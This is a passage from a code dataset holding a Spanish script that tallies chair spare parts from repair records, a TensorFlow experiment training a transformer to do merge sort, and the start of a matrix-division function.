str(final.estrella))\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Kit de ruedas: ' + str(final.rueda))\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Brazos: ' + str(final.brazo))\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Pistón: ' + str(final.piston))\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Estrellas: ' + str(final.basculante))\n ejeY = ejeY - 25\n pdf.drawImage(final.nombre+'.png', ejeX+220, ejeY-55, 250, 250, preserveAspectRatio=True, mask='auto')\n ejeY = ejeY - 50\n\n pdf.drawString(ejeX, ejeY, 'Sobre un total de: ' + str(\n dataAverias.size) + '. 
Se podría haber solucionado con el envío de repuestos')\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'un total de: ' + str(sillasSalvables) + ' casos')\n ejeY = ejeY - 25\n porcentaje = (sillasSalvables / dataAverias.size) * 100\n porcentaje = round(porcentaje, 2)\n pdf.drawString(ejeX, ejeY, 'Lo que hace un porcentaje de: ' + str(porcentaje) + '%')\n pdf.save()\n\n\ndef crearGraficas(allSillas: list):\n for final in allSillas:\n if not (final.piston == 0 and final.estrella == 0 and\n final.rueda == 0 and final.brazo == 0 and\n final.basculante == 0):\n fig, ax = plt.subplots()\n ax.set_title('Piezas ' + final.nombre)\n ax.bar(['Estrellas', 'Ruedas', 'Brazos', 'Pistón', 'Basculante'],\n [final.estrella, final.rueda, final.brazo, final.piston, final.basculante])\n plt.savefig(final.nombre + '.png', dpi=fig.dpi)\n\n\ndef main():\n # Palabras que nos servirán para identificar la pieza que necesitamos para reponer\n palabrasClave = ['estrella', 'patas', 'base', 'soporte', 'rueda', 'brazo', 'piston', 'basculante', 'no sube',\n 'tubo de metal', 'baja sola', 'no sube', 'bloqueado']\n\n nombresComparar = ['Newskill', 'Corsair', 'Drift', 'Razer', 'Noblechair', 'MSI', 'Tempest', 'Sharkoon', 'Asus',\n 'Nacon', 'Woxter', 'Playseat', 'Forgeon', 'Aerocool', 'Equip', 'Genesis', 'HP', 'Next Level',\n 'NGS', 'Oplite', 'Owlotech', 'Thermaltake', 'Trust', 'ZEN']\n\n directorio = \"C:/Users/RMA-BANCADA-7/Documents/RMAS de Sillas desde 01_01_2022.xls\"\n # Se obtiene datos\n dataMarcas = obtenerdatoscolumna(directorio, 'productName')\n dataAverias = obtenerdatoscolumna(directorio, 'info')\n # Se crean todos los objetos\n allSillas = crearobjetos(nombresComparar)\n sillasSalvables: int = 0\n # Se itera sobre averias\n for i in range(dataAverias.size):\n # Se obtiene la marca actual que estamos comprobando\n actualMarca: str = encontrarMarca(dataMarcas[i], nombresComparar)\n # Se comprueba que marca existe\n if actualMarca:\n # Traemos el objeto silla que se va a utilizar\n actualSilla: Silla = encontrarSilla(actualMarca, allSillas)\n\n repuesto: str = esReparable(dataAverias[i], palabrasClave)\n if repuesto:\n sillasSalvables = sillasSalvables + 1\n if repuesto == 'estrella' or repuesto == 'patas' or repuesto == 'soporte':\n actualSilla.estrella = actualSilla.estrella + 1\n if repuesto == 'rueda':\n actualSilla.rueda = actualSilla.rueda + 1\n if repuesto == 'brazo':\n actualSilla.brazo = actualSilla.brazo + 1\n if repuesto == 'piston' or repuesto == 'tubo' or repuesto == 'no sube' or repuesto == 'tubo de metal' \\\n or repuesto == 'baja sola' or repuesto == 'no sube' or repuesto == 'bloqueado':\n actualSilla.piston = actualSilla.piston + 1\n if repuesto == 'basculante':\n actualSilla.basculante = actualSilla.basculante + 1\n\n crearGraficas(allSillas)\n crearPdf(allSillas, dataAverias, sillasSalvables)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Lorca94/RepuestosSillas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1649583632","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nimport time\nimport matplotlib.pyplot as plt\nimport sys\nimport numpy as np\nsys.path.append('../data/')\nsys.path.append('../model/')\nsys.path.append('../')\nfrom merge_data import *\nfrom model import *\nfrom utils import *\n\ndef run_merge(current_dir, reload_from_dir, reload_dir, checkpoint_path_data, 
checkpoint_path_msk):\n binary_size = 8\n d_model = 16\n\n seq_len_1 = 8\n seq_len = seq_len_1*2\n\n Train_SIZE = 5000 \n Train_small_size = 500\n BATCH_SIZE = 64\n Val_size = 500\n Val_small_size = 50\n num_filters = 16\n filter_size = 3\n\n\n num_max = 2**binary_size\n end_token = 2 ** binary_size\n pad_token = 2 ** binary_size + 1\n\n state_size = seq_len+1\n num_layers = 6\n dff = 128\n\n target_vocab_size = binary_size + 1\n dropout_rate = 0.1\n \n if reload_from_dir:\n EPOCHS = 1\n else:\n EPOCHS = 100\n res_ratio = 1.5\n\n out_num = True\n out_pos = True\n assert(out_num or out_pos)\n pos_enc = 3\n\n discount = 0.005\n make_sym = True\n USE_positioning = False\n with open(\"{}parameters.txt\".format(current_dir), 'w') as fi:\n fi.write(\"binary_size: {}\\nd_model: {}\\nseq_len_1: {}\\nseq_len: {}\\nTrain_SIZE: {}\\nTrain_small_size: {}\\nBATCH_SIZE: {}\\nVal_size: {}\\nVal_small_size: {}\\nnum_filters: {}\\nfilter_size: {}\\nnum_max: {}\\nnum_layers: {}\\ndff: {}\\ntarget_vocab_size: {}\\ndropout_rate: {}\\nmake_sym: {}\\nEPOCHS: {}\\nres_ratio: {}\\nout_num: {}\\nout_pos: {}\\nUSE_positioning: {}\\npos_enc: {}\\ndiscount: {}\".format(binary_size, d_model, seq_len_1, seq_len, Train_SIZE, Train_small_size, BATCH_SIZE, Val_size, Val_small_size, num_filters, filter_size, num_max, num_layers, dff, target_vocab_size, dropout_rate, make_sym, EPOCHS, res_ratio, out_num, out_pos, USE_positioning, pos_enc, discount) + reload_from_dir * \"\\nreload_dir: {}\".format(reload_dir))\n \n Train_dataset, Val_dataset, Texmp_size = merge_data_gen(current_dir, reload_from_dir, reload_dir, num_max, Train_SIZE, Train_small_size, Val_size, Val_small_size, state_size, seq_len_1, seq_len)\n def encode(tr, mask, srt, pos_list):\n seq_l = np.int64(np.floor(len(tr)/2))\n tr = np.hstack((tr[:seq_l], end_token, tr[seq_l:], end_token))\n srt = np.hstack((srt, end_token))\n pos_list = np.hstack((pos_list, seq_l))\n return tr, mask, srt, pos_list\n \n def tf_encode(tr, mask, srt, pos_list):\n return tf.py_function(encode, [tr, mask, srt, pos_list], [tf.int64, tf.int64, tf.int64, tf.int64])\n\n def encode_wo_mask(tr, srt):\n seq_l = np.int64(np.floor(len(tr)/2))\n tr = np.hstack((tr[:seq_l], end_token, tr[seq_l:], end_token))\n srt = np.hstack((srt, end_token))\n return tr, srt\n\n def tf_encode_wo_mask(tr, srt):\n return tf.py_function(encode_wo_mask,[tr, srt], [tf.int64, tf.int64])\n\n train_dataset = Train_dataset.map(tf_encode)\n train_dataset = train_dataset.cache()\n train_dataset = train_dataset.shuffle(Texmp_size).batch(BATCH_SIZE)\n train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\n exmp = next(iter(train_dataset))\n print(exmp[0][0,:])\n print(exmp[1][0,:,:])\n print(exmp[2][0,:])\n print(exmp[3][0,:])\n\n val_dataset = Val_dataset.map(tf_encode)\n val_dataset = val_dataset.batch(BATCH_SIZE)\n\n exmp = next(iter(val_dataset))\n print(exmp[0][0,:])\n print(exmp[1][0,:,:])\n print(exmp[2][0,:])\n print(exmp[3][0,:])\n \n transformer = Transformer(num_layers, d_model, binary_size+1, dff, pos_enc, target_vocab_size, make_sym, USE_positioning, out_num, out_pos, res_ratio, dropout_rate)\n msk_transform = mask_transform(num_filters, filter_size, dropout_rate)\n \n learning_rate_data = CustomSchedule(d_model)\n learning_rate_msk = CustomSchedule(num_filters)\n\n optimizer_data = tf.keras.optimizers.Adam(learning_rate_data, beta_1=0.9, beta_2=0.98, \n epsilon=1e-9)\n\n optimizer_msk = tf.keras.optimizers.Adam(learning_rate_msk, beta_1=0.9, beta_2=0.98, \n epsilon=1e-9)\n \n ckpt_data = 
tf.train.Checkpoint(transformer=transformer,\n optimizer_data=optimizer_data)\n ckpt_msk = tf.train.Checkpoint(msk_transform=msk_transform,\n optimizer_msk=optimizer_msk)\n\n\n ckpt_manager_data = tf.train.CheckpointManager(ckpt_data, checkpoint_path_data, max_to_keep=5)\n ckpt_manager_msk = tf.train.CheckpointManager(ckpt_msk, checkpoint_path_msk, max_to_keep=5)\n # if a checkpoint exists, restore the latest checkpoint.\n if ckpt_manager_data.latest_checkpoint:\n ckpt_data.restore(ckpt_manager_data.latest_checkpoint)\n print ('Model_data checkpoint restored!!')\n\n if ckpt_manager_msk.latest_checkpoint:\n ckpt_msk.restore(ckpt_manager_msk.latest_checkpoint)\n print ('Model_msk checkpoint restored!!')\n \n train_data_loss = tf.keras.metrics.Mean(name='train_data_loss')\n train_data_content_loss = tf.keras.metrics.Mean(name='train_data_content_loss')\n train_data_pos_loss = tf.keras.metrics.Mean(name='train_data_pos_loss')\n train_msk_loss = tf.keras.metrics.Mean(name='train_msk_loss')\n train_data_accuracy = tf.keras.metrics.Accuracy(name='train_data_accuracy')\n train_msk_accuracy = tf.keras.metrics.Accuracy(name='train_msk_accuracy')\n d_loss = tf.keras.metrics.Mean(name='d_loss')\n d_accuracy = tf.keras.metrics.Accuracy(name='d_accuracy')\n \n def create_masks(mask, seq_1, seq_2):\n mask_first = mask[:,:,0]\n mask_second = mask[:,:,1]\n batch_size = mask.shape[0]\n state_size = mask.shape[1]\n emb_1 = tf.one_hot(mask_first, seq_1+1, axis=-1)\n emb_2 = tf.one_hot(mask_second, seq_2+1, axis=-1)\n enc_padding_mask = tf.concat([emb_1, emb_2], -1)\n \n combined_mask = None\n enc_padding_mask = 1-enc_padding_mask\n enc_padding_mask = enc_padding_mask[:,:,tf.newaxis,:]\n dec_padding_mask = enc_padding_mask\n return enc_padding_mask, combined_mask, dec_padding_mask\n \n summary_writer = tf.summary.create_file_writer(current_dir + 'logs')\n @tf.function\n def train_step_data(inp, mask, tar, pos, seq_1, seq_2):\n batch_size = mask.shape[0]\n state_size = mask.shape[-2]\n enc_inp = tf.tile(inp[:, tf.newaxis, :], [1, state_size, 1])\n dec_inp = tf.zeros((batch_size, state_size, 1), dtype=tf.int64)\n enc_padding_mask, combined_mask, dec_padding_mask = create_masks(mask, seq_1, seq_2)\n chg_mask = tf.one_hot(pos, seq_1+seq_2+2)\n with tf.GradientTape() as tape:\n predictions,_,predicted_pos = transformer(enc_inp, dec_inp, True, enc_padding_mask, combined_mask, dec_padding_mask)\n predictions = tf.squeeze(predictions, -2)\n weights = tf.concat([tf.ones((tar.shape[0], seq_1+seq_2)), tf.ones((tar.shape[0], 1))*discount],-1)\n loss_content = loss_function(binary_encoding(tar, binary_size+1), predictions, weights)\n loss_position = loss_pos(chg_mask, predicted_pos, weights)\n loss = loss_content + loss_position\n gradients = tape.gradient(loss, transformer.trainable_variables)\n optimizer_data.apply_gradients(zip(gradients, transformer.trainable_variables))\n train_data_loss(loss)\n train_data_content_loss(loss_content)\n train_data_pos_loss(loss_position) \n tf.summary.scalar(\"data_loss\", train_data_loss.result(), step=optimizer_data.iterations)\n tf.summary.scalar(\"data_content_loss\", train_data_content_loss.result(), step=optimizer_data.iterations)\n tf.summary.scalar(\"data_pos_loss\", train_data_pos_loss.result(), step=optimizer_data.iterations)\n pred_binary = tf.cast(tf.greater(predictions, 0), tf.int64)\n pred_binary = back2int(pred_binary)\n train_data_accuracy(tar, pred_binary)\n return tf.transpose(enc_padding_mask,[0,1,3,2]), chg_mask[:,:,:,tf.newaxis] \n \n @tf.function\n def 
train_step_msk(init_msk, chg_msk):\n x = tf.concat([init_msk, chg_msk], axis=-1)\n ######## exclude the last one ###############\n x = x[:,:-1,:,:]\n tar_msk = init_msk[:,1:,:,0]\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n with tf.GradientTape() as tape:\n predict_msk = msk_transform(x, True) #### batch_size*seq_len, seq_len\n predict_msk = tf.reshape(predict_msk, (tar_msk.shape[0], tar_msk.shape[-2], tar_msk.shape[-1]))\n loss_msk = loss_function(tar_msk, predict_msk)\n gradients = tape.gradient(loss_msk, msk_transform.trainable_variables)\n optimizer_msk.apply_gradients(zip(gradients, msk_transform.trainable_variables))\n train_msk_loss(loss_msk)\n tf.summary.scalar(\"msk_loss\", train_msk_loss.result(), step=optimizer_msk.iterations)\n predict_msk_binary = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n err = tf.reduce_sum(tar_msk-predict_msk_binary, axis=-1)\n train_msk_accuracy(err, tf.zeros_like(err))\n \n \n def eval_val(state_size, dataset, seq_1, seq_2, name='Validation', include_pos_loss=True):\n d_loss.reset_states()\n d_accuracy.reset_states()\n for element in dataset:\n if include_pos_loss:\n inp, mask, tar, _ = element\n msk_tar, _, _ = create_masks(mask, seq_1, seq_2)\n else:\n inp, tar = element\n enc_inp = inp[:, tf.newaxis, :]\n batch_size = enc_inp.shape[0]\n dec_inp = tf.zeros((batch_size, 1, 1), dtype=tf.int64)\n \n enc_padding_mask = tf.concat([tf.ones((batch_size, 1, 1)), tf.zeros((batch_size, 1, seq_1)), tf.ones((batch_size, 1, 1)), tf.zeros((batch_size, 1, seq_2))], -1)\n enc_padding_mask = 1-enc_padding_mask[:,:,tf.newaxis,:]\n dec_padding_mask = enc_padding_mask\n combined_mask = None\n \n if include_pos_loss:\n mask_list = []\n out_list = []\n for i in range(state_size):\n predictions,_,predicted_pos = transformer(enc_inp, dec_inp, False, enc_padding_mask, combined_mask, dec_padding_mask)\n out_list.append(tf.squeeze(predictions, -2))\n ########### replace argmax (uncertain) ############\n predicted_pos_max = tf.reduce_max(predicted_pos, axis=-1, keepdims=True)\n predicted_pos_max = tf.equal(predicted_pos, predicted_pos_max)\n predicted_pos_ind = tf.reshape(predicted_pos_max, [-1, predicted_pos_max.shape[-1]])\n predicted_pos_ind = tf.where(predicted_pos_ind)\n pos_id = tf.cast(tf.math.segment_min(predicted_pos_ind[:,1],predicted_pos_ind[:,0]), tf.int64)\n pos_id = tf.reshape(pos_id, [predicted_pos_max.shape[0], predicted_pos_max.shape[1]])\n \n chg_msk = tf.one_hot(pos_id, seq_1+seq_2+2)[:,:,:,tf.newaxis]\n init_msk = tf.transpose(enc_padding_mask,[0,1,3,2])\n x = tf.concat([init_msk,chg_msk],axis=-1)\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n predict_msk = msk_transform(x, False)\n if include_pos_loss:\n mask_list.append(predict_msk[:,tf.newaxis,:])\n predict_msk = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n enc_padding_mask = predict_msk[:, tf.newaxis, tf.newaxis, :]\n dec_padding_mask = enc_padding_mask\n if include_pos_loss:\n mask_est = tf.concat(mask_list[:-1], -2)\n loss_position = loss_function(msk_tar[:,1:,0,:], mask_est)\n else:\n loss_position = 0\n out_est = tf.concat(out_list, -2)\n loss_content = loss_function(binary_encoding(tar, binary_size+1), out_est)\n loss = loss_position + loss_content\n d_loss(loss)\n \n out_binary = tf.cast(tf.greater(out_est, 0), tf.int64)\n out_binary = back2int(out_binary)\n # if not tf.equal(tf.reduce_sum(tar-out_binary),0):\n # print(\"inp\")\n # print(inp)\n # print(\"tar\")\n # print(tar)\n # print(\"pre_out\")\n # print(out_binary)\n d_accuracy(tar, out_binary)\n 
print('{}_Loss {:.4f} {}_Accuracy {:.4f}'.format(name, d_loss.result(), name, d_accuracy.result()))\n return d_accuracy.result()\n \n for epoch in range(EPOCHS):\n start = time.time()\n train_data_loss.reset_states()\n train_data_content_loss.reset_states()\n train_data_pos_loss.reset_states()\n train_msk_loss.reset_states()\n train_data_accuracy.reset_states()\n train_msk_accuracy.reset_states()\n with summary_writer.as_default():\n for (batch, (inp, mask, tar, pos)) in enumerate(train_dataset):\n init_msk, chg_msk = train_step_data(inp, mask, tar, pos, seq_len_1, seq_len_1)\n train_step_msk(init_msk, chg_msk)\n if batch % 500 == 0:\n print('Epoch {} Batch {}:\\nTraining_Data_Loss {:.4f} Training_Data_Accuracy {:.4f}\\nTraining_Msk_Loss {:.4f} Training_Msk_Accuracy {:.4f}'.format(epoch+1, batch, train_data_loss.result(), train_data_accuracy.result(), train_msk_loss.result(), train_msk_accuracy.result()))\n eval_val(state_size, val_dataset, seq_len_1, seq_len_1)\n if (epoch + 1) % 5 == 0:\n ckpt_save_path_data = ckpt_manager_data.save()\n ckpt_save_path_msk = ckpt_manager_msk.save()\n print(\"Saving checkpoint for epoch {} at {} and {}\".format(epoch + 1, ckpt_save_path_data, ckpt_save_path_msk))\n print('Epoch {} Batch {}:\\nTraining_Data_Loss {:.4f} Training_Data_Accuracy {:.4f}\\nTraining_Msk_Loss {:.4f} Training_Msk_Accuracy {:.4f}'.format(epoch+1, batch, train_data_loss.result(), train_data_accuracy.result(), train_msk_loss.result(), train_msk_accuracy.result()))\n eval_val(state_size, val_dataset, seq_len_1, seq_len_1)\n print('Time taken for 1 epoch: {} secs\\n'.format(time.time()-start))\n \n \n max_seq_len = 100\n max_seq_step = 60\n test_size_random = 60\n test_size_small_steps = 10\n acc = []\n for i in range(9, max_seq_len+1):\n test_random = np.random.choice(range(num_max), (test_size_random, i))\n test_special = []\n if tf.less_equal(i, max_seq_step):\n for step in range(1,5):\n start_tst = np.random.choice(range(num_max-(i-1)*step), (test_size_small_steps, 1), replace=False)\n test = np.tile(start_tst, [1, i])\n test += np.arange(0, i*step, step)\n test_special.append(test)\n else:\n for step in range(1,5):\n start_tst = np.random.choice(range(num_max-(max_seq_step-1)*step), (test_size_small_steps, 1), replace=False)\n test = np.tile(start_tst, [1, max_seq_step])\n test += np.arange(0, max_seq_step*step, step)\n padded_random = np.random.choice(range(num_max), (test_size_small_steps, i-max_seq_step))\n test = np.concatenate((test, padded_random), axis=-1)\n test_special.append(test)\n test_special = np.concatenate(test_special, axis=0)\n np.apply_along_axis(np.random.shuffle, 1, test_special)\n test = np.concatenate([test_random, test_special], axis=0)\n \n test_out = np.zeros_like(test, dtype='int64')\n for j, seq in enumerate(test):\n out_seq, _, _ = join(seq)\n test_out[j,:] = out_seq\n \n test_dataset = tf.data.Dataset.from_tensor_slices((test, test_out))\n test_dataset = test_dataset.map(tf_encode_wo_mask)\n test_dataset = test_dataset.batch(BATCH_SIZE)\n seq_1 = np.int64(np.floor(i/2))\n seq_2 = i-seq_1\n acc.append(eval_val(i+1, test_dataset, seq_1, seq_2, name=\"Test_seq{}\".format(i), include_pos_loss=False)) \n \n \n plt.figure()\n plt.plot(range(9, 9+len(acc)), acc)\n plt.xlabel('seq_len')\n plt.ylabel('merge_func_acc')\n filename = \"merge_func_acc_plot.png\"\n plt.savefig(current_dir+filename)\n \n \n def evaluate(inp_sentence, seq_1):\n seq_2 = inp_sentence.shape[-1]-seq_1\n \n inp_sentence = np.hstack((inp_sentence[:seq_1], end_token, inp_sentence[seq_1:], 
end_token))\n inp_sentence = inp_sentence.astype('int64')\n inp_sentence = tf.convert_to_tensor(inp_sentence)\n \n enc_inp = inp_sentence[tf.newaxis, tf.newaxis, :]\n dec_inp = tf.zeros((1,1,1), dtype=tf.int64)\n enc_padding_mask = tf.concat([tf.ones((1,1,1)), tf.zeros((1, 1, seq_1)), tf.ones((1,1,1)), tf.zeros((1,1,seq_2))],-1)\n enc_padding_mask = 1-enc_padding_mask[:,:,tf.newaxis,:]\n dec_padding_mask = enc_padding_mask\n combined_mask = None\n \n out_list = []\n attention_weights = []\n for i in range(seq_1+seq_2+1): ###### predicted_pos: (1,1,seq_1+seq_2+2)\n predictions, _, predicted_pos = transformer(enc_inp, dec_inp, False, enc_padding_mask, combined_mask, dec_padding_mask)\n attention_weights.append(tf.squeeze(predicted_pos,0)) # (1,seq_1+seq_2+2)\n ############### replace argmax ################################\n out_list.append(tf.squeeze(predictions))\n predicted_pos = tf.squeeze(predicted_pos, 1)\n att_max = tf.reduce_max(predicted_pos, axis=-1, keepdims=True)\n att_max_ind = tf.where(tf.equal(predicted_pos, att_max))\n pos_id = tf.cast(tf.math.segment_min(att_max_ind[:,1],att_max_ind[:,0]), tf.int64)\n pos_id = pos_id[:,tf.newaxis]\n chg_msk = tf.one_hot(pos_id, seq_1+seq_2+2)[:,:,:,tf.newaxis]\n init_msk = tf.transpose(enc_padding_mask,[0,1,3,2])\n x = tf.concat([init_msk,chg_msk],axis=-1)\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n predict_msk = msk_transform(x, False)\n predict_msk = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n enc_padding_mask = predict_msk[:, tf.newaxis, tf.newaxis, :]\n dec_padding_mask = enc_padding_mask\n \n out_est = tf.stack(out_list, axis=0)\n out_binary = tf.cast(tf.greater(out_est, 0), tf.int64)\n out_binary = back2int(out_binary) \n return out_binary, tf.concat(attention_weights, -2)\n \n seq_1 = 2\n seq_2 = 2\n random_num = np.random.choice(range(num_max), (seq_1+seq_2))\n print(\"random num test:\")\n print(\"original_sequence: {}\".format(random_num))\n output, _ = evaluate(random_num, seq_1)\n print(\"predicted_sequence: {}\".format(output))\n \n \n def merge_sort(dataset, name='Test'):\n d_loss.reset_states()\n d_accuracy.reset_states()\n for (batch, (inp, tar)) in enumerate(dataset):\n batch_size = inp.shape[0]\n seq_len = inp.shape[-1]\n L = tf.cast(tf.math.ceil(tf.math.log(tf.cast(seq_len, tf.float32))/tf.math.log(2.0)), tf.int64)\n pad_num = tf.pow(2,L)-seq_len\n inp_new = tf.concat([inp[:,:,tf.newaxis], tf.ones([batch_size, seq_len, 1], dtype=tf.int64)*end_token], -1)\n inp_new = tf.concat([inp_new, pad_token*tf.ones([batch_size, pad_num, 2], dtype=tf.int64)], -2)\n for i in range(1, L+1):\n j = tf.pow(2,i)\n inp_res = tf.reshape(inp_new, [-1, j+2])\n batch_size_new = inp_res.shape[0]\n \n enc_inp = inp_res[:, tf.newaxis,:]\n dec_inp = tf.zeros((batch_size_new, 1, 1), dtype=tf.int64)\n \n seq_1 = tf.pow(2,i-1)\n seq_2 = seq_1\n enc_mask = create_padding_mask(inp_res)\n enc_padding_mask = tf.concat([tf.ones((batch_size_new, 1, 1)), tf.zeros((batch_size_new, 1, seq_1)), tf.ones((batch_size_new, 1, 1)), tf.zeros((batch_size_new, 1, seq_2))], -1)\n enc_padding_mask = 1-enc_padding_mask[:,:,tf.newaxis,:]\n enc_padding_mask = tf.maximum(enc_mask, enc_padding_mask)\n \n dec_padding_mask = enc_padding_mask\n combined_mask = None\n \n out_list =[]\n for _ in range(j+1):\n predictions, _, predicted_pos = transformer(enc_inp, dec_inp, False, enc_padding_mask, combined_mask, dec_padding_mask)\n out_list.append(tf.squeeze(predictions, -2))\n ########## compute argmax #################\n predicted_pos_max = 
tf.reduce_max(predicted_pos, axis=-1, keepdims=True)\n predicted_pos_max = tf.equal(predicted_pos, predicted_pos_max)\n predicted_pos_ind = tf.reshape(predicted_pos_max, [-1, predicted_pos_max.shape[-1]])\n predicted_pos_ind = tf.where(predicted_pos_ind)\n pos_id = tf.cast(tf.math.segment_min(predicted_pos_ind[:,1],predicted_pos_ind[:,0]), tf.int64)\n pos_id = tf.reshape(pos_id, [predicted_pos_max.shape[0], predicted_pos_max.shape[1]])\n ############################################\n chg_msk = tf.one_hot(pos_id, seq_1+seq_2+2)[:,:,:,tf.newaxis]\n init_msk = tf.transpose(enc_padding_mask,[0,1,3,2])\n x = tf.concat([init_msk,chg_msk],axis=-1)\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n predict_msk = msk_transform(x, False)\n predict_msk = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n enc_padding_mask = predict_msk[:, tf.newaxis, tf.newaxis, :]\n dec_padding_mask = enc_padding_mask\n inp_new = tf.concat(out_list, -2)\n inp_new = tf.cast(tf.greater(inp_new, 0), tf.int64)\n inp_new = back2int(inp_new) \n if tf.equal(i, L):\n d_accuracy(tar, inp_new[:,:seq_len+1])\n print('{}_Accuracy {:.4f}'.format(name, d_accuracy.result()))\n return d_accuracy.result()\n\n def encode_sort(tr, srt):\n srt = np.hstack((srt, end_token))\n return tr, srt\n\n def tf_encode_sort(tr, srt):\n return tf.py_function(encode_sort, [tr, srt], [tf.int64, tf.int64])\n\n max_seq_len = 100\n max_seq_step = 60\n test_size_random = 60\n test_size_small_steps = 10\n acc = []\n for i in range(2, max_seq_len+1):\n test_random = np.random.choice(range(num_max), (test_size_random, i))\n test_special = []\n if tf.less_equal(i, max_seq_step):\n for step in range(1,5):\n start_tst = np.random.choice(range(num_max-(i-1)*step), (test_size_small_steps, 1), replace=False)\n test = np.tile(start_tst, [1, i])\n test += np.arange(0, i*step, step)\n test_special.append(test)\n else:\n for step in range(1,5):\n start_tst = np.random.choice(range(num_max-(max_seq_step-1)*step), (test_size_small_steps, 1), replace=False)\n test = np.tile(start_tst, [1, max_seq_step])\n test += np.arange(0, max_seq_step*step, step)\n padded_random = np.random.choice(range(num_max), (test_size_small_steps, i-max_seq_step))\n test = np.concatenate((test, padded_random), axis=-1)\n test_special.append(test)\n test_special = np.concatenate(test_special, axis=0)\n np.apply_along_axis(np.random.shuffle, 1, test_special)\n test = np.concatenate([test_random, test_special], axis=0)\n \n Sorted_test = np.sort(test)\n test_dataset = tf.data.Dataset.from_tensor_slices((test, Sorted_test))\n test_dataset = test_dataset.map(tf_encode_sort)\n test_dataset = test_dataset.batch(BATCH_SIZE)\n acc.append(merge_sort(test_dataset, name=\"Test_seq{}\".format(i))) \n \n\n\n # In[ ]:\n\n\n def merge_sort_test_exmp(inp):\n print(\"Original sequence:\")\n print(inp)\n print(\"Target sequence:\")\n print(np.sort(inp))\n seq_len = inp.shape[-1]\n L = tf.cast(tf.math.ceil(tf.math.log(tf.cast(seq_len, tf.float32))/tf.math.log(2.0)), tf.int64)\n pad_num = tf.pow(2,L)-seq_len\n inp_new = tf.concat([inp[tf.newaxis,:,tf.newaxis], tf.ones([1, seq_len, 1], dtype=tf.int64)*end_token], -1)\n inp_new = tf.concat([inp_new, pad_token*tf.ones([inp_new.shape[0], pad_num, 2], dtype=tf.int64)], -2)\n for i in range(1, L+1):\n print(\"step {}:\".format(i))\n j = tf.pow(2,i)\n inp_res = tf.reshape(inp_new, [-1, j+2])\n batch_size_new = inp_res.shape[0]\n \n enc_inp = inp_res[:, tf.newaxis,:]\n dec_inp = tf.zeros((batch_size_new, 1, 1), dtype=tf.int64)\n\n seq_1 = tf.pow(2,i-1)\n seq_2 
= seq_1\n enc_mask = create_padding_mask(inp_res)\n enc_padding_mask = tf.concat([tf.ones((batch_size_new, 1, 1)), tf.zeros((batch_size_new, 1, seq_1)), tf.ones((batch_size_new, 1, 1)), tf.zeros((batch_size_new, 1, seq_2))], -1)\n enc_padding_mask = 1-enc_padding_mask[:,:,tf.newaxis,:]\n enc_padding_mask = tf.maximum(enc_mask, enc_padding_mask)\n \n dec_padding_mask = enc_padding_mask\n combined_mask = None\n \n out_list =[]\n for _ in range(j+1):\n predictions, _, predicted_pos = transformer(enc_inp, dec_inp, False, enc_padding_mask, combined_mask, dec_padding_mask)\n out_list.append(tf.squeeze(predictions, -2))\n ########## compute argmax #################\n predicted_pos_max = tf.reduce_max(predicted_pos, axis=-1, keepdims=True)\n predicted_pos_max = tf.equal(predicted_pos, predicted_pos_max)\n predicted_pos_ind = tf.reshape(predicted_pos_max, [-1, predicted_pos_max.shape[-1]])\n predicted_pos_ind = tf.where(predicted_pos_ind)\n pos_id = tf.cast(tf.math.segment_min(predicted_pos_ind[:,1],predicted_pos_ind[:,0]), tf.int64)\n pos_id = tf.reshape(pos_id, [predicted_pos_max.shape[0], predicted_pos_max.shape[1]])\n ############################################\n chg_msk = tf.one_hot(pos_id, seq_1+seq_2+2)[:,:,:,tf.newaxis]\n init_msk = tf.transpose(enc_padding_mask,[0,1,3,2])\n x = tf.concat([init_msk,chg_msk],axis=-1)\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n predict_msk = msk_transform(x, False)\n predict_msk = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n enc_padding_mask = predict_msk[:, tf.newaxis, tf.newaxis, :]\n dec_padding_mask = enc_padding_mask\n inp_new = tf.concat(out_list, -2)\n inp_new = tf.cast(tf.greater(inp_new, 0), tf.int64)\n inp_new = back2int(inp_new)\n inp_new_re = tf.reshape(inp_new, (-1,))\n print(tf.squeeze(tf.gather(inp_new_re, tf.where(tf.not_equal(inp_new_re, end_token))))[:seq_len])\n\n\n # In[ ]:\n\n\n test_length = 100\n step = 2\n random_num = np.random.choice(range(num_max), (test_length,))\n print(\"random num test:\")\n merge_sort_test_exmp(random_num)\n start_tst = np.random.choice(range(num_max-(test_length-1)*step))\n test = np.tile(start_tst, [test_length])\n test += np.arange(0, test_length*step, step)\n np.apply_along_axis(np.random.shuffle, 0, test)\n print(\"granularity test (step: {}):\".format(step))\n merge_sort_test_exmp(test)\n ","repo_name":"Yujun-Yan/Neural-Execution-Engines","sub_path":"run_exp/run_merge_sort.py","file_name":"run_merge_sort.py","file_ext":"py","file_size_in_byte":28029,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"21457761951","text":"#!/usr/bin/python3\n\"\"\" module with a function that divides all elements of a matrix \"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"function that divides all elements of a matrix\"\"\"\n if (not isinstance(matrix, list) or matrix == []\n or not all(isinstance(row, list) for row in matrix)):\n raise 